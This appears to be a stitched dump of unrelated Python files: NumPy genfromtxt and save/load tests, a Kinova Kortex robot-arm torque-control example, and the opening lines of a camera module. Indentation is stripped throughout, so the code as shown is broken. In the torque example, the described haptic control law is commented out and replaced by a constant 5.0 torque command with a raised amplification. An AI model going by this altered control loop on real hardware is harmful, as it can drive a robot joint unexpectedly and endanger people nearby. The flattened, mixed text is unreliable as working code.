ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fixed-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# Skip the test if the utf8 test string cannot be encoded with the
# preferred encoding. The preferred encoding is assumed to be the
# default encoding of io.open. This may need to change for pytest,
# maybe using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# genfromtxt doesn't work with unicode here, so yield bytes.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.genfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.int_)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
def test_unpack_structured(self):
# Regression test for gh-4341
# Unpacking should work on structured arrays
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('S1', 'i4', 'f4')}
a, b, c = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_equal(a.dtype, np.dtype('S1'))
assert_equal(b.dtype, np.dtype('i4'))
assert_equal(c.dtype, np.dtype('f4'))
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_unpack_auto_dtype(self):
# Regression test for gh-4341
# Unpacking should work when dtype=None
txt = TextIO("M 21 72.\nF 35 58.")
expected = (np.array(["M", "F"]), np.array([21, 35]), np.array([72., 58.]))
test = np.genfromtxt(txt, dtype=None, unpack=True, encoding="utf-8")
for arr, result in zip(expected, test):
assert_array_equal(arr, result)
assert_equal(arr.dtype, result.dtype)
def test_unpack_single_name(self):
# Regression test for gh-4341
# Unpacking should work when structured dtype has only one field
txt = TextIO("21\n35")
dt = {'names': ('a',), 'formats': ('i4',)}
expected = np.array([21, 35], dtype=np.int32)
test = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_array_equal(expected, test)
assert_equal(expected.dtype, test.dtype)
def test_squeeze_scalar(self):
# Regression test for gh-4341
# Unpacking a scalar should give zero-dim output,
# even if dtype is structured
txt = TextIO("1")
dt = {'names': ('a',), 'formats': ('i4',)}
expected = np.array((1,), dtype=np.int32)
test = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_array_equal(expected, test)
assert_equal((), test.shape)
assert_equal(expected.dtype, test.dtype)
class TestPathUsage:
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
if IS_PYPY:
break_cycles()
break_cycles()
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
if IS_PYPY:
break_cycles()
break_cycles()
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter:
def __init__(self, base):
self.base = base
def write(self, s):
return self.base.write(s)
def flush(self):
return self.base.flush()
class JustReader:
def __init__(self, base):
self.base = base
def read(self, n):
return self.base.read(n)
def seek(self, off, whence=0):
return self.base.seek(off, whence)
def test_ducktyping():
a = np.random.random((5, 5))
s = BytesIO()
f = JustWriter(s)
np.save(f, a)
f.flush()
s.seek(0)
f = JustReader(s)
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
torque_control.py
|
#! /usr/bin/env python3
###
# KINOVA (R) KORTEX (TM)
#
# Copyright (c) 2019 Kinova inc. All rights reserved.
#
# This software may be modified and distributed
# under the terms of the BSD 3-Clause license.
#
# Refer to the LICENSE file for details.
#
###
###
# * DESCRIPTION OF CURRENT EXAMPLE:
# ===============================
# This example works as a simple haptic-like demo.
#
# The last actuator, the small one holding the interconnect, acts as a torque sensing device commanding the first actuator.
# The first actuator, the big one on the base, is controlled in torque and its position is sent as a command to the last one.
#
# The script can be launched from the command line with python3: python3 torque_control.py
# The PC should be connected to the arm through Ethernet. The default IP address 192.168.1.12 is used as the arm address.
#
# 1- Connection with the base:
#     1- A TCP session is started on port 10000 for most API calls. Refresh is at 25ms on this port.
#     2- A UDP session is started on port 10001 for BaseCyclic calls. Refresh is at 1ms on this port only.
# 2- Initialization
#     1- First frame is built based on arm feedback to ensure continuity
#     2- First actuator torque command is set as well
#     3- Base is set in low-level servoing
#     4- First frame is sent
#     5- First actuator is switched to torque mode
# 3- Cyclic thread is running at 1ms
#     1- Torque command to first actuator is set to a multiple of the last actuator torque measure, minus its
#        initial value, to avoid an initial offset error
#     2- Position command to last actuator equals first actuator position minus initial delta
#
# 4- On keyboard interrupt, example stops
#     1- Cyclic thread is stopped
#     2- First actuator is set back to position control
#     3- Base is set in single level servoing (default)
###
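#
# In code terms, the cyclic law described above is (see RunCyclic below; this is only a
# summary of the logic already present in this file, not additional behaviour):
#   torque_cmd[0]   = init_first_torque + torque_amplification * (torque_meas[6] - init_last_torque)
#   position_cmd[6] = position_meas[0] - init_delta_position
# Note that in this copy, the line implementing the first formula is commented out in
# RunCyclic and replaced by a constant torque command of 5.0.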
import sys
import os
from kortex_api.autogen.client_stubs.ActuatorConfigClientRpc import ActuatorConfigClient
from kortex_api.autogen.client_stubs.ActuatorCyclicClientRpc import ActuatorCyclicClient
from kortex_api.autogen.client_stubs.BaseClientRpc import BaseClient
from kortex_api.autogen.client_stubs.BaseCyclicClientRpc import BaseCyclicClient
from kortex_api.autogen.client_stubs.DeviceConfigClientRpc import DeviceConfigClient
from kortex_api.autogen.client_stubs.DeviceManagerClientRpc import DeviceManagerClient
from kortex_api.autogen.messages import Session_pb2, ActuatorConfig_pb2, Base_pb2, BaseCyclic_pb2, Common_pb2
from kortex_api.RouterClient import RouterClientSendOptions
import time
import sys
import threading
class TorqueExample:
def __init__(self, router, router_real_time):
self.expected_number_of_actuators = 7 # example works for 7dof Gen3
# self.torque_amplification = 2.0 # Torque measure on 7th actuator is sent as a command to first actuator
self.torque_amplification = 20.0 # Torque measure on 7th actuator is sent as a command to first actuator
# Create required services
device_manager = DeviceManagerClient(router)
self.actuator_config = ActuatorConfigClient(router)
self.base = BaseClient(router)
self.base_cyclic = BaseCyclicClient(router_real_time)
self.base_command = BaseCyclic_pb2.Command()
self.base_feedback = BaseCyclic_pb2.Feedback()
self.base_custom_data = BaseCyclic_pb2.CustomData()
# Detect all devices
device_handles = device_manager.ReadAllDevices()
self.actuator_count = 0
# Only actuators are relevant for this example
for handle in device_handles.device_handle:
if handle.device_type == Common_pb2.BIG_ACTUATOR or handle.device_type == Common_pb2.SMALL_ACTUATOR:
self.base_command.actuators.add()
self.base_feedback.actuators.add()
self.actuator_count += 1
# Change send option to reduce max timeout at 3ms
self.sendOption = RouterClientSendOptions()
self.sendOption.andForget = False
self.sendOption.delay_ms = 0
self.sendOption.timeout_ms = 3
self.cyclic_t_end = 30 #Total duration of the thread in seconds. 0 means infinite.
self.cyclic_thread = {}
self.kill_the_thread = False
self.already_stopped = False
self.cyclic_running = False
def MoveToHomePosition(self):
# Make sure the arm is in Single Level Servoing mode
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Move arm to ready position
print("Moving the arm to a safe position")
action_type = Base_pb2.RequestedActionType()
action_type.action_type = Base_pb2.REACH_JOINT_ANGLES
action_list = self.base.ReadAllActions(action_type)
action_handle = None
for action in action_list.action_list:
if action.name == "Home":
action_handle = action.handle
if action_handle == None:
print("Can't reach safe position. Exiting")
return False
self.base.ExecuteActionFromReference(action_handle)
time.sleep(20) # Leave time to action to complete
return True
def InitCyclic(self, sampling_time_cyclic, t_end, print_stats):
if self.cyclic_running:
return True
# Move to Home position first
if not self.MoveToHomePosition():
return False
print("Init Cyclic")
sys.stdout.flush()
base_feedback = self.SendCallWithRetry(self.base_cyclic.RefreshFeedback, 3)
if base_feedback:
self.base_feedback = base_feedback
if len(self.base_feedback.actuators) == self.expected_number_of_actuators:
# Init command frame
for x in range(self.actuator_count):
self.base_command.actuators[x].flags = 1 # servoing
self.base_command.actuators[x].position = self.base_feedback.actuators[x].position
# First actuator is going to be controlled in torque
# To ensure continuity, torque command is set to measure
self.base_command.actuators[0].torque_joint = self.base_feedback.actuators[0].torque
# Set arm in LOW_LEVEL_SERVOING
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.LOW_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Send first frame
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
# Set first actuator in torque mode now that the command is equal to measure
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('TORQUE')
                device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
# Init cyclic thread
self.cyclic_t_end = t_end
self.cyclic_thread = threading.Thread(target=self.RunCyclic, args=(sampling_time_cyclic, print_stats))
self.cyclic_thread.daemon = True
self.cyclic_thread.start()
return True
else:
print("InitCyclic: number of actuators in base_feedback does not match expected number")
return False
else:
print("InitCyclic: failed to communicate")
return False
def RunCyclic(self, t_sample, print_stats):
self.cyclic_running = True
print("Run Cyclic")
sys.stdout.flush()
cyclic_count = 0 # Counts refresh
stats_count = 0 # Counts stats prints
failed_cyclic_count = 0 # Count communication timeouts
# Initial delta between first and last actuator
init_delta_position = self.base_feedback.actuators[0].position - self.base_feedback.actuators[6].position
# Initial first and last actuator torques; avoids unexpected movement due to torque offsets
init_last_torque = self.base_feedback.actuators[6].torque
init_first_torque = -self.base_feedback.actuators[0].torque # Torque measure is reversed compared to actuator direction
t_now = time.time()
t_cyclic = t_now # cyclic time
t_stats = t_now # print time
t_init = t_now # init time
print("Running torque control example for {} seconds".format(self.cyclic_t_end))
while not self.kill_the_thread:
t_now = time.time()
# Cyclic Refresh
if (t_now - t_cyclic) >= t_sample:
t_cyclic = t_now
                    # Position command to first actuator is set to its measured position so that a following error is not triggered.
                    # Bonus: by doing this instead of disabling the following error, if communication is lost while the first
                    # actuator keeps moving under the torque command, the resulting position error will trigger a following
                    # error and switch the actuator back to position control so it holds its position.
self.base_command.actuators[0].position = self.base_feedback.actuators[0].position
# First actuator torque command is set to last actuator torque measure times an amplification
# self.base_command.actuators[0].torque_joint = init_first_torque + \
# self.torque_amplification * (self.base_feedback.actuators[6].torque - init_last_torque)
self.base_command.actuators[0].torque_joint = 5.0
print(self.base_command.actuators[0].torque_joint)
# First actuator position is sent as a command to last actuator
self.base_command.actuators[6].position = self.base_feedback.actuators[0].position - init_delta_position
                # Incrementing the identifier ensures actuators can reject out-of-time frames
self.base_command.frame_id += 1
if self.base_command.frame_id > 65535:
self.base_command.frame_id = 0
for i in range(self.expected_number_of_actuators):
self.base_command.actuators[i].command_id = self.base_command.frame_id
# Frame is sent
try:
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
except:
failed_cyclic_count = failed_cyclic_count + 1
print("failed")
cyclic_count = cyclic_count + 1
# Stats Print
if print_stats and ((t_now - t_stats) > 1):
t_stats = t_now
stats_count = stats_count + 1
cyclic_count = 0
failed_cyclic_count = 0
sys.stdout.flush()
if self.cyclic_t_end != 0 and (t_now - t_init > self.cyclic_t_end):
print("Cyclic Finished")
sys.stdout.flush()
break
self.cyclic_running = False
return True
def StopCyclic(self):
print ("Stopping the cyclic and putting the arm back in position mode...")
if self.already_stopped:
return
# Kill the thread first
if self.cyclic_running:
self.kill_the_thread = True
self.cyclic_thread.join()
# Set first actuator back in position mode
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('POSITION')
device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
self.cyclic_t_end = 0.1
self.already_stopped = True
print('Clean Exit')
@staticmethod
def SendCallWithRetry(call, retry, *args):
i = 0
arg_out = []
while i < retry:
try:
arg_out = call(*args)
break
except:
i = i + 1
continue
if i == retry:
print("Failed to communicate")
return arg_out
def main():
# Import the utilities helper module
import argparse
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import utilities
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--cyclic_time", type=float, help="delay, in seconds, between cylic control call", default=0.001)
parser.add_argument("--duration", type=int, help="example duration, in seconds (0 means infinite)", default=30)
parser.add_argument("--print_stats", default=True, help="print stats in command line or not (0 to disable)", type=lambda x: (str(x).lower() not in ['false', '0', 'no']))
args = utilities.parseConnectionArguments(parser)
# Create connection to the device and get the router
with utilities.DeviceConnection.createTcpConnection(args) as router:
with utilities.DeviceConnection.createUdpConnection(args) as router_real_time:
example = TorqueExample(router, router_real_time)
success = example.InitCyclic(args.cyclic_time, args.duration, args.print_stats)
if success:
while example.cyclic_running:
try:
time.sleep(0.5)
except KeyboardInterrupt:
break
example.StopCyclic()
if __name__ == "__main__":
main()
|
camera.py
|
""" This module contains camera class """
import os
import cv2 as cv
from sshtunnel import open_tunnel
from contextlib import contextmanager
